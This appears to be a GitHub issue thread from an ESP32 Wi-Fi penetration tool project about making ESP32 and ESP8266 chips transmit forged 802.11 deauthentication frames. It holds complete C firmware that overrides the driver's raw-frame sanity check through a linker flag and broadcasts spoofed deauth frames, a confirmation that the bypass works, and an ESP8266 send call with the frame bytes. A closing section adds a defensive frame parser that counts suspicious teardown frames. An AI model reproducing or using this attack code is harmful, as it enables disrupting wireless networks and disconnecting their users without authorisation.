Comments (3)
@risinek So I managed to get the ESP-IDF framework working in Platformio using Arduino as Component.
I am not familiar with the process for installing the esp-idf in Platformio, but I managed to get the Platformio version of the ESP-IDF here. The version I installed however translates to version 4.2 of the ESP-IDF. I could not find one for 4.1...so this might be contributing to the problem. Not sure.
I wrote a small demo code that initializes wifi, transmits 10 deauth frames, sleeps for 10 seconds, then reboots (See code below).
I run the code on my ESP32 but Wireshark does not show any deauths being sent. I verified my wsl bypass is being called instead of the original by placing a printf in the method to show it is being called. I also verified my -zmuldefs flag in my cmakelist is set properly by removing it, building, and seeing it fail with an error that there are multiple definitions of the sanity check function. I set the flag again then it built properly.
I just want to verify my source code so I can eliminate it as a possibility for this demo not working. I suspect if it is not an issue with my source then it is an issue with the version of the ESP-IDF I installed.
By the way, thank you for taking the time to help me out. I know this isn't necessarily related to your project, but this is the only other place I have seen someone talking about getting an ESP32 to send deauthentication frames.
Code
```c
#include <stdio.h>
#include "sdkconfig.h"
#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_log.h"
#include "esp_err.h"
#include "esp_system.h"
#include "esp_spi_flash.h"
#include "esp_wifi.h"
#include "esp_wifi_types.h"

static uint8_t original_mac_ap[6];
const wifi_promiscuous_filter_t filt = {.filter_mask = WIFI_PROMIS_FILTER_MASK_MGMT | WIFI_PROMIS_FILTER_MASK_DATA};

static const uint8_t deauth_frame_default[] = {
    0xc0, 0x00, 0x3a, 0x01,              // frame control, duration
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,  // destination address
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,  // source address
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,  // BSSID
    0xf0, 0xff, 0x02, 0x00               // sequence control, reason code
};

static void wifi_event_handler(void *event_handler_arg, esp_event_base_t event_base, int32_t event_id, void *event_data){
}

// Replaces the Wi-Fi library's function of the same name (needs the -zmuldefs linker flag).
int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
    printf("Sanity check bypass called!\n");
    return 0;
}

void wsl_bypasser_send_raw_frame(const uint8_t *frame_buffer, int size){
    esp_wifi_80211_tx(WIFI_IF_AP, frame_buffer, size, false);
}

static void wifi_init_apsta(){
    wifi_init_config_t wifi_init_config = WIFI_INIT_CONFIG_DEFAULT();
    esp_wifi_init(&wifi_init_config);
    esp_wifi_set_promiscuous_filter(NULL);
    esp_wifi_set_promiscuous(true);
    esp_wifi_set_max_tx_power(78);
    esp_wifi_set_storage(WIFI_STORAGE_RAM);
    esp_wifi_set_mode(WIFI_MODE_APSTA);
    esp_wifi_set_channel(11, WIFI_SECOND_CHAN_NONE);
    esp_wifi_start();
}

void app_main(void)
{
    printf("Hello world!\n");
    printf("ESP-IDF version is: ");
    // Print through "%s" so the version string is never used as a format string.
    printf("%s", esp_get_idf_version());
    printf("\n");
    wifi_init_apsta();
    // Was sleep(0.1): sleep() takes whole seconds, so 0.1 truncated to 0.
    vTaskDelay(100 / portTICK_PERIOD_MS);
    for (int i = 0; i < 10; i++) {
        printf("Sending deauth...\n");
        wsl_bypasser_send_raw_frame(deauth_frame_default, sizeof(deauth_frame_default));
        // Was sleep(1), which needs <unistd.h>; same one-second delay.
        vTaskDelay(1000 / portTICK_PERIOD_MS);
    }
    for (int i = 10; i >= 0; i--) {
        printf("Restarting in %d seconds...\n", i);
        vTaskDelay(1000 / portTICK_PERIOD_MS);
    }
    printf("Restarting now.\n");
    fflush(stdout);
    esp_restart();
}
```
Quick Update
After messing around with the Arduino IDE, I was able to send deauth frames. I can confirm the WSL bypass method does work on arduino esp32 v2.0.0 (esp-idf v4.4) and you CAN get the ESP32 to send deauth frames using the firmware written in the Arduino IDE.
from esp32-wifi-penetration-tool.
I'm not familiar with platformio unfortunately. I think one possibility is to precompile wsl_bypasser from this repo and then link it while compiling using Platformio - e.g. like described here.
A second option may be to use the same flag for the linker as is done in this repo's cmakefile, as it seems doable based on this documentation.
But like I said, I'm not familiar with platformio, so I'm just guessing it may work this way 🙈 When I have spare time, I will learn more about platformio and try to find a way.
from esp32-wifi-penetration-tool.
Hi risinek and justcallmekoko,
I am currently trying to write my own deauthenticator to flash onto the ESP8266 chip. I cannot get the deauth packet to send and am out of ideas as to where I am going wrong.
So far I run a web server and access point to be able to interact with the scanned wireless access points. Currently I am having a similar issue, where I am unable to send the deauth frame. When I bring up Wireshark I am not seeing any traffic. The frame is formatted almost exactly the same as yours, but slightly tweaked.
```c
uint8_t deauth_frame[26] = {
    0xc0, 0x00, 0x3a, 0x01,
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,
    0xf0, 0xff, 0x02, 0x00
};
```
Currently I have the values hard coded, so I was thinking that could potentially be my problem. To send the packet I am using the below code (the same as you send it in your deauth_all code):
```c
wifi_send_pkt_freedom(deauth_frame, 26, 0);
```
Do you have any ideas as to why this might not be working? Apologies for the unconventional way of asking, I wasn't sure how best to contact you. Unfortunately it seems a lot of similar questions on Stack Overflow have not been answered.
All the best.
from esp32-wifi-penetration-tool.
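Seen from the monitoring side, the 26-byte frame quoted in the posts above decodes as below. This is an added example, not code from the thread or from esp32-wifi-penetration-tool; the names `teardown_t`, `parse_teardown` and `count_suspicious` are hypothetical, and it assumes raw 802.11 frames with no radiotap header and no FCS.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constructed sample: the 26-byte frame quoted in the thread. */
static const uint8_t sample_deauth[26] = {
    0xc0, 0x00, 0x3a, 0x01,               /* frame control, duration */
    0xff, 0xff, 0xff, 0xff, 0xff, 0xff,   /* addr1: destination */
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,   /* addr2: source */
    0xCE, 0xCC, 0x45, 0x69, 0xEB, 0x14,   /* addr3: BSSID */
    0xf0, 0xff, 0x02, 0x00                /* sequence control, reason code */
};

typedef struct {
    uint8_t  subtype;                     /* 0x0c deauthentication, 0x0a disassociation */
    uint8_t  dst[6], src[6], bssid[6];
    uint16_t reason;                      /* little-endian on the wire */
    int      broadcast, protected_frame;  /* addr1 all-ones; Protected bit (802.11w) */
} teardown_t;

/* Returns 1 and fills *out if buf is a deauth/disassoc management frame, else 0. */
int parse_teardown(const uint8_t *buf, size_t len, teardown_t *out) {
    static const uint8_t bcast[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
    if (!buf || !out || len < 26) return 0;   /* 24-byte header + 2-byte reason */
    if ((buf[0] & 0x0f) != 0) return 0;       /* version 0, type 0 (management) */
    out->subtype = buf[0] >> 4;
    if (out->subtype != 0x0c && out->subtype != 0x0a) return 0;
    memcpy(out->dst, buf + 4, 6);
    memcpy(out->src, buf + 10, 6);
    memcpy(out->bssid, buf + 16, 6);
    out->reason = (uint16_t)(buf[24] | (buf[25] << 8));
    out->broadcast = memcmp(out->dst, bcast, 6) == 0;
    out->protected_frame = (buf[1] & 0x40) != 0;
    return 1;
}

/* Counts unprotected, broadcast-addressed teardown frames in a window of n frames. */
size_t count_suspicious(const uint8_t *const frames[], const size_t lens[], size_t n) {
    size_t hits = 0;
    teardown_t t;
    for (size_t i = 0; i < n; i++)
        if (parse_teardown(frames[i], lens[i], &t) && t.broadcast && !t.protected_frame) hits++;
    return hits;
}

int main(void) {   /* exit status 0 when the sample frame is flagged */
    const uint8_t *const f[] = {sample_deauth};
    const size_t l[] = {sizeof sample_deauth};
    return count_suspicious(f, l, 1) == 1 ? 0 : 1;
}
```

A monitor would compare the count per capture window against a threshold chosen for the site, since legitimate access points also send occasional deauthentication frames.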